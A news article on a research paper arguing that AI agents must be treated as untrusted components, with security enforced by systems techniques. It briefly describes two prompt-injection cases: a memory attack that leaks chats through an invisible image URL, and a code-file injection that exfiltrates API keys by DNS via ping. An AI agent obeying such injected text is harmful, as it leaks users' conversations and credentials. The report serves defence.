AI Agents Must Be Treated as Untrusted Systems: Researchers

Google and Meta researchers say AI model robustness alone cannot secure agentic systems.
Eleven real-world attacks show prompt injection bypasses model-level defences every time.
Agents need instruction data separation, least privilege sandboxing and information flow control.

A research paper from scientists at Google, Meta, UC San Diego, and several universities has taken a direct position that challenges how the industry currently approaches AI agent security.

The paper, titled Agent Security Is a Systems Problem, argues that treating AI models as the primary security layer is fundamentally insufficient. The model powering any agent must instead be treated as an untrusted component, the same way an operating system treats an external process, with security enforced at the system level around it.

“Efforts to increase model robustness are insufficient on their own,” the researchers wrote. “We must complement existing efforts with techniques from the systems security domain.”

Why the Current Approach Keeps Failing

The researchers analysed eleven real-world attacks on AI agents and found the same pattern every time. Developers trusted the AI model to police itself. Attackers found ways around it.

Two documented cases illustrate the problem. A ChatGPT memory feature attack allowed an attacker to inject malicious instructions through an ordinary document, causing the system to continuously send user conversations to an external server via an invisible image URL.

A Claude Code attack used prompt injection hidden inside a code file to extract API keys and exfiltrate them through a DNS query using the ping command, which had been allowed without human approval.

In both cases, the model had no reliable mechanism to stop the attack because the malicious instructions were indistinguishable from legitimate ones at the model level.

Three Principles the Industry Is Ignoring

The researchers identified three core security principles from decades of systems security that AI deployments consistently fail to implement:

Instruction and data separation: Trusted instructions and untrusted external data flow through the same token stream with no separation, making prompt injection structurally possible.
Least privilege sandboxing: Agents are routinely deployed with access to shell commands, file systems, and APIs far beyond what any specific task requires.
Information flow control: Sensitive data can leak through indirect channels even when access controls exist.

The Bigger Problem

AI agents have no judgment and no self-preservation instinct. They will explore every directory they have access to at machine speed. They will execute any instruction that reaches them if the system allows it.

The security infrastructure built around human actors was never designed for this. Until it is rebuilt for machine actors, every organisation deploying agents with access to production systems is carrying a risk it cannot fully measure.

Advertise here

Disclaimer: The information presented in this article is for informational and educational purposes only. The article does not constitute financial advice or advice of any kind. Coin Edition is not responsible for any losses incurred as a result of the utilization of content, products, or services mentioned. Readers are advised to exercise caution before taking any action related to the company.

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Researchers Warn AI Agents Must Be Treated as Untrusted Systems or Security Will Fail

Why the Current Approach Keeps Failing

Three Principles the Industry Is Ignoring

The Bigger Problem

Latest news

XRP Price Prediction: Will the Weekly FVG Hold XRP Above $1.09 Into the CLARITY Act Deadline?

Bitcoin Price Prediction: Is the 0.79 OTE the Buy Zone Before BTC Retakes $67,000

Dogecoin Price Prediction: DOGE Eyes Recovery, but Weak Market Signals Limit Momentum

XRP Price Prediction: Ripple Unveils RLUSD Mint and Notabene Partnership But XRP Barely Moves

Shiba Inu Price Prediction: Can Bulls Push SHIB Higher as Burn Rate Exceeds 41%?